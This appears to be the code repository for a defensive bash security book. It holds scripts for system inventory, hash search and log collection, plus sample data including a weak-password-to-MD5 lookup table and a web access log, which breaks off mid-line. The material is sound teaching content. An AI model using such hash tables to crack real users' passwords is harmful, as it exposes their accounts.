[
  {
    "path": "LICENSE",
    "content": "MIT License\n\nCopyright (c) 2019 Cybersecurity Ops with bash\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n"
  },
  {
    "path": "ch03/echoparams.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# echoparams.sh\n#\n# Description: \n# Demonstrates accessing parameters in bash\n#\n# Usage:\n# ./echoparms.sh <param 1> <param 2> <param 3>\n#\n\necho $#\necho $0\necho $1\necho $2\necho $3\n"
  },
  {
    "path": "ch03/osdetect.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# osdetect.sh\n#\n# Description: \n# Distinguish between MS-Windows/Linux/MacOS\n#\n# Usage: bash osdetect.sh\n#   output will be one of: Linux MSWin macOS\n#\n\nif type -t wevtutil &> /dev/null           # <1>\nthen\n    OS=MSWin\nelif type -t scutil &> /dev/null           # <2>\nthen\n    OS=macOS\nelse\n    OS=Linux\nfi\necho $OS\n"
  },
  {
    "path": "ch04/frost.txt",
    "content": "1    Two roads diverged in a yellow wood,\n2    And sorry I could not travel both\n3    And be one traveler, long I stood\n4    And looked down one as far as I could\n5    To where it bent in the undergrowth;\n6\n7 Excerpt from The Road Not Taken by Robert Frost\n"
  },
  {
    "path": "ch05/cmds.txt",
    "content": "#Linux Command   |MSWin  Bash |XML tag    |Purpose\n#----------------+------------+-----------+------------------------------\nuname -a         |uname -a    |uname      |O.S. version etc\ncat /proc/cpuinfo|systeminfo  |sysinfo    |system hardware and related info\nifconfig         |ipconfig    |nwinterface|Network interface information\nip route         |route print |nwroute    |routing table\narp -a           |arp -a      |nwarp      |ARP table\nnetstat -a       |netstat -a  |netstat    |network connections\nmount            |net share   |diskinfo   |mounted disks\nps -e            |tasklist    |processes  |running processes\n"
  },
  {
    "path": "ch05/cutfile.txt",
    "content": "12/05/2017 192.168.10.14 test.html\n12/30/2017 192.168.10.185 login.html\n"
  },
  {
    "path": "ch05/getlocal.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# getlocal.sh\n#\n# Description: \n# Gathers general system information and dumps it to a file\n#\n# Usage:\n# bash getlocal.sh < cmds.txt\n#   cmds.txt is a file with list of commands to run\n#\n\n# SepCmds - separate the commands from the line of input\nfunction SepCmds()\n{\n      LCMD=${ALINE%%|*}                   # <11>\n      REST=${ALINE#*|}                    # <12>\n      WCMD=${REST%%|*}                    # <13>\n      REST=${REST#*|}\n      TAG=${REST%%|*}                     # <14>\n      \n      if [[ $OSTYPE == \"MSWin\" ]]\n      then\n         CMD=\"$WCMD\"\n      else\n         CMD=\"$LCMD\"\n      fi\n}\n\nfunction DumpInfo ()\n{                                                              # <5>\n    printf '<systeminfo host=\"%s\" type=\"%s\"' \"$HOSTNAME\" \"$OSTYPE\"\n    printf ' date=\"%s\" time=\"%s\">\\n' \"$(date '+%F')\" \"$(date '+%T')\"\n    readarray CMDS                           # <6>\n    for ALINE in \"${CMDS[@]}\"                # <7>\n    do\n       # ignore comments\n       if [[ ${ALINE:0:1} == '#' ]] ; then continue ; fi     # <8>\n\n      SepCmds\n\n      if [[ ${CMD:0:3} == N/A ]]             # <9>\n      then\n          continue\n      else\n          printf \"<%s>\\n\" $TAG               # <10>\n          $CMD\n          printf \"</%s>\\n\" $TAG\n      fi\n    done\n    printf \"</systeminfo>\\n\"\n} \n\nOSTYPE=$(./osdetect.sh)                     # <1>\nHOSTNM=$(hostname)                          # <2>\nTMPFILE=\"${HOSTNM}.info\"                    # <3>\n\n# gather the info into the tmp file; errors, too\nDumpInfo  > $TMPFILE  2>&1                  # <4>\n\n"
  },
  {
    "path": "ch05/hashsearch.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# hashsearch.sh\n#\n# Description: \n# Recursively search a given directory for a file that\n# matches a given SHA-1 hash\n#\n# Usage:\n# hashsearch.sh <hash> <directory>\n#   hash - SHA-1 hash value to file to find\n#   directory - Top directory to start search\n#\n\nHASH=$1\nDIR=${2:-.}\t# default is here, cwd\n\n# convert pathname into an absolute path\nfunction mkabspath ()\t\t\t\t# <6>\n{\n    if [[ $1 == /* ]]\t\t\t\t# <7>\n    then\n    \tABS=$1\n    else\n    \tABS=\"$PWD/$1\"\t\t\t\t# <8>\n    fi\n}\n\nfind $DIR -type f |\t\t\t\t# <1>\nwhile read fn\ndo\n    THISONE=$(sha1sum \"$fn\")\t\t\t# <2>\n    THISONE=${THISONE%% *}\t\t\t# <3>\n    if [[ $THISONE == $HASH ]]\n    then\n\tmkabspath \"$fn\"\t\t\t\t# <4>\n\techo $ABS\t\t\t\t# <5>\n    fi\ndone\n"
  },
  {
    "path": "ch05/typesearch.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# typesearch.sh\n#\n# Description: \n# Search the file system for a given file type. It prints out the\n# pathname when found.\n#\n# Usage:\n# typesearch.sh [-c dir] [-i] [-R|r] <pattern> <path>\n#   -c Copy files found to dir\n#   -i Ignore case\n#   -R|r Recursively search subdirectories\n#   <pattern> File type pattern to search for\n#   <path> Path to start search\n#\n\nDEEPORNOT=\"-maxdepth 1\"\t\t# just the current dir; default\n\n# PARSE option arguments:\nwhile getopts 'c:irR' opt; do                         # <1>\n  case \"${opt}\" in                                    # <2>\n    c) # copy found files to specified directory\n\t       COPY=YES\n\t       DESTDIR=\"$OPTARG\"                             # <3>\n\t       ;;\n    i) # ignore u/l case differences in search\n\t       CASEMATCH='-i'\n\t       ;;\n    [Rr]) # recursive                                 # <4>\n        unset DEEPORNOT;;                             # <5>\n    *)  # unknown/unsupported option                  # <6>\n        # error mesg will come from getopts, so just exit\n        exit 2 ;;\n  esac\ndone\nshift $((OPTIND - 1))                                 # <7>\n\n\nPATTERN=${1:-PDF document}                            # <8>\nSTARTDIR=${2:-.}\t# by default start here\n\nfind $STARTDIR $DEEPORNOT -type f | while read FN     # <9>\ndo\n    file $FN | egrep -q $CASEMATCH \"$PATTERN\"          # <10>\n    if (( $? == 0 ))   # found one                    # <11>\n    then\n\t        echo $FN\n\t        if [[ $COPY ]]                               # <12>\n\t        then\n\t            cp -p $FN $DESTDIR                       # <13>\n\t        fi\n    fi\ndone\n\n"
  },
  {
    "path": "ch05/winlogs.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# winlogs.sh\n#\n# Description: \n# Gather copies of Windows log files\n#\n# Usage:\n# winlogs.sh [-z] [dir]\n#   -z   Tar and zip the output\n#   dir  Optional scratch directory for holding the log files\n\nTGZ=0\nif (( $# > 0 ))\t\t\t\t\t\t# <1>\nthen\n    if [[ ${1:0:2} == '-z' ]]\t\t\t\t# <2>\n    then\n\tTGZ=1\t# tgz flag to tar/zip the log files\n\tshift\n    fi\nfi\nSYSNAM=$(hostname)\nLOGDIR=${1:-/tmp/${SYSNAM}_logs}\t\t\t# <3>\n\nmkdir -p $LOGDIR\t\t\t\t\t# <4>\ncd ${LOGDIR} || exit -2\n\nwevtutil el | while read ALOG\t\t\t\t# <5>\ndo\n    ALOG=\"${ALOG%$'\\r'}\"\t\t\t\t# <6>\n    echo \"${ALOG}:\"\t\t\t\t\t# <7>\n    SAFNAM=\"${ALOG// /_}\"\t\t\t\t# <8>\n    SAFNAM=\"${SAFNAM//\\//-}\"\n    wevtutil epl \"$ALOG\" \"${SYSNAM}_${SAFNAM}.evtx\"\ndone\n\nif (( TGZ == 1 ))\t\t\t\t\t# <9>\nthen\n    tar -czvf ${SYSNAM}_logs.tgz *.evtx\t\t\t# <10>\nfi\n"
  },
  {
    "path": "ch06/accesstime.txt",
    "content": "0745,file1.txt,1\n0830,file4.txt,2\n0830,file5.txt,3\n"
  },
  {
    "path": "ch06/awkusers.txt",
    "content": "Mike Jones\nJohn Smith\nKathy Jones\nJane Kennedy\nTim Scott\n"
  },
  {
    "path": "ch06/book.json",
    "content": "{ <1>\n  \"title\": \"Cybersecurity Ops with bash\", <2>\n  \"edition\": 1,\n  \"authors\": [ <3>\n    {\n      \"firstName\": \"Paul\",\n      \"lastName\": \"Troncone\"\n    },\n    {\n      \"firstName\": \"Carl\",\n      \"lastName\": \"Albing\"\n    }\n  ]\n}\n"
  },
  {
    "path": "ch06/book.xml",
    "content": "<book title=\"Cybersecurity Ops with bash\" edition=\"1\"> <1>\n  <author> <2>\n    <firstName>Paul</firstName> <3>\n    <lastName>Troncone</lastName>\n  </author> <4>\n  <author>\n    <firstName>Carl</firstName>\n    <lastName>Albing</lastName>\n  </author>\n</book>\n"
  },
  {
    "path": "ch06/csvex.txt",
    "content": "\"name\",\"username\",\"phone\",\"password hash\"\n\"John Smith\",\"jsmith\",\"555-555-1212\",5f4dcc3b5aa765d61d8327deb882cf99\n\"Jane Smith\",\"jnsmith\",\"555-555-1234\",e10adc3949ba59abbe56e057f20f883e\n\"Bill Jones\",\"bjones\",\"555-555-6789\",d8578edf8458ce06fbc5bb76a58c5ca4"
  },
  {
    "path": "ch06/ips.txt",
    "content": "ip,OS\n10.0.4.2,Windows 8\n10.0.4.35,Ubuntu 16\n10.0.4.107,macOS\n10.0.4.145,macOS\n"
  },
  {
    "path": "ch06/passwords.txt",
    "content": "password,md5hash\n123456,e10adc3949ba59abbe56e057f20f883e\npassword,5f4dcc3b5aa765d61d8327deb882cf99\nwelcome,40be4e59b9a2a2b5dffb918c0e86b3d7\nninja,3899dcbab79f92af727c2190bbd8abc5\nabc123,e99a18c428cb38d5f260853678922e03\n123456789,25f9e794323b453885f5181f1b624d0b\n12345678,25d55ad283aa400af464c76d713c07ad\nsunshine,0571749e2ac330a7455809c6b0e7af90\nprincess,8afa847f50a716e64932d995c8e7435a\nqwerty,d8578edf8458ce06fbc5bb76a58c5c"
  },
  {
    "path": "ch06/procowner.txt",
    "content": "Process Owner;PID\njdoe;0\ntjones;4\njsmith;340\nmsmith;528\n"
  },
  {
    "path": "ch06/tasks.txt",
    "content": "\nImage Name;PID;Session Name;Session#;Mem Usage\nSystem Idle Process;0;Services;0;4 K\nSystem;4;Services;0;2,140 K\nsmss.exe;340;Services;0;1,060 K\ncsrss.exe;528;Services;0;4,756 K\n"
  },
  {
    "path": "ch06/user.txt",
    "content": "user,ip\njdoe,10.0.4.2\njsmith,10.0.4.35\nmsmith,10.0.4.107\ntjones,10.0.4.145\n"
  },
  {
    "path": "ch06/usernames.txt",
    "content": "1,jdoe\n2,puser\n3,jsmith\n"
  },
  {
    "path": "ch07/access.log",
    "content": "192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] \"GET / HTTP/1.1\" 200 2377 \"-\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] \"GET /backblue.gif HTTP/1.1\" 200 4529 \"http://192.168.0.35/\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] \"GET /fade.gif HTTP/1.1\" 200 1112 \"http://192.168.0.35/\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] \"GET /favicon.ico HTTP/1.1\" 404 503 \"-\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] \"GET /index.html HTTP/1.1\" 200 6933 \"-\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] \"GET /favicon.ico HTTP/1.1\" 404 504 \"-\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] \"GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1\" 200 3413 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] \"GET /files/theme/custom49c2.js?1490908488 HTTP/1.1\" 200 1429 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] \"GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1\" 200 19444 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:53:00 -0500] \"GET /uploads/2/9/1/4/29147191/941880.png HTTP/1.1\" 200 7835 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:53:00 -0500] \"GET /uploads/2/9/1/4/29147191/31549414299.png?457 HTTP/1.1\" 200 81377 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:53:00 -0500] \"GET /uploads/2/9/1/4/29147191/2670902_orig.jpg HTTP/1.1\" 200 19526 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:53:00 -0500] \"GET /uploads/2/9/1/4/29147191/2267842_orig.jpg HTTP/1.1\" 200 42818 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:53:00 -0500] \"GET /uploads/2/9/1/4/29147191/2992005_orig.jpg HTTP/1.1\" 200 47030 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] \"GET /about.html HTTP/1.1\" 200 7042 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] \"GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1\" 200 3414 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] \"GET /files/theme/custom49c2.js?1490908488 HTTP/1.1\" 200 1430 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] \"GET /uploads/2/9/1/4/29147191/page-layouts-4078890_orig.jpg HTTP/1.1\" 200 265418 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] \"GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1\" 200 19445 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/GW-bridge.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] \"GET /consulting.html HTTP/1.1\" 200 7269 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] \"GET /files/theme/custom49c2.js?1490908488 HTTP/1.1\" 200 1430 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] \"GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1\" 200 3414 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] \"GET /uploads/2/9/1/4/29147191/398980_orig.png HTTP/1.1\" 200 120188 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] \"GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1\" 200 19445 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:54:11 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Colaboration.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] \"GET / HTTP/1.1\" 200 2377 \"-\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] \"GET /backblue.gif HTTP/1.1\" 200 4529 \"http://192.168.0.35/\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] \"GET /fade.gif HTTP/1.1\" 200 1113 \"http://192.168.0.35/\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] \"GET /favicon.ico HTTP/1.1\" 404 503 \"-\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] \"GET /index.html HTTP/1.1\" 200 6932 \"-\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] \"GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1\" 200 3414 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] \"GET /files/theme/custom49c2.js?1490908488 HTTP/1.1\" 200 1430 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] \"GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1\" 200 19444 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] \"GET /uploads/2/9/1/4/29147191/941880.png HTTP/1.1\" 200 7835 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] \"GET /uploads/2/9/1/4/29147191/31549414299.png?457 HTTP/1.1\" 200 81377 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] \"GET /uploads/2/9/1/4/29147191/2670902_orig.jpg HTTP/1.1\" 200 19525 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] \"GET /uploads/2/9/1/4/29147191/2992005_orig.jpg HTTP/1.1\" 200 47029 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] \"GET /uploads/2/9/1/4/29147191/2267842_orig.jpg HTTP/1.1\" 200 42819 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:30 -0500] \"GET /support.html HTTP/1.1\" 200 6207 \"http://192.168.0.35/index.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:30 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/support.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:31 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working2.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/support.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:39 -0500] \"GET /request-quote.html HTTP/1.1\" 200 7326 \"http://192.168.0.35/support.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:39 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/request-quote.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:39 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Colaboration.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/request-quote.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:54:39 -0500] \"GET /files/theme/images/select-arrowaf0e.png?1509483497 HTTP/1.1\" 200 1386 \"http://192.168.0.35/files/main_styleaf0e.css?1509483497\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] \"GET /products.html HTTP/1.1\" 200 7158 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] \"GET /uploads/2/9/1/4/29147191/253922682aa.png?162 HTTP/1.1\" 200 16602 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] \"GET /uploads/2/9/1/4/29147191/99480889766.png?165 HTTP/1.1\" 200 26428 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] \"GET /uploads/2/9/1/4/29147191/32981bd4c.png?161 HTTP/1.1\" 200 38062 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] \"GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1\" 200 3414 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] \"GET /files/theme/custom49c2.js?1490908488 HTTP/1.1\" 200 1430 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] \"GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1\" 200 19445 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:15:56:53 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working2.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/products.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] \"GET /resources.html HTTP/1.1\" 200 7569 \"http://192.168.0.35/request-quote.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] \"GET /uploads/2/9/1/4/29147191/identity_orig.png HTTP/1.1\" 200 47804 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] \"GET /uploads/2/9/1/4/29147191/editor/078519-blue-jelly-icon-business-envelope5ca13.png?1492225862 HTTP/1.1\" 200 7769 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] \"GET /uploads/2/9/1/4/29147191/428026.png HTTP/1.1\" 200 20174 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] \"GET /uploads/2/9/1/4/29147191/principlesofcyber_orig.png HTTP/1.1\" 200 43725 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] \"GET /uploads/2/9/1/4/29147191/principlesofencryption-nb_orig.png HTTP/1.1\" 200 45954 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] \"GET 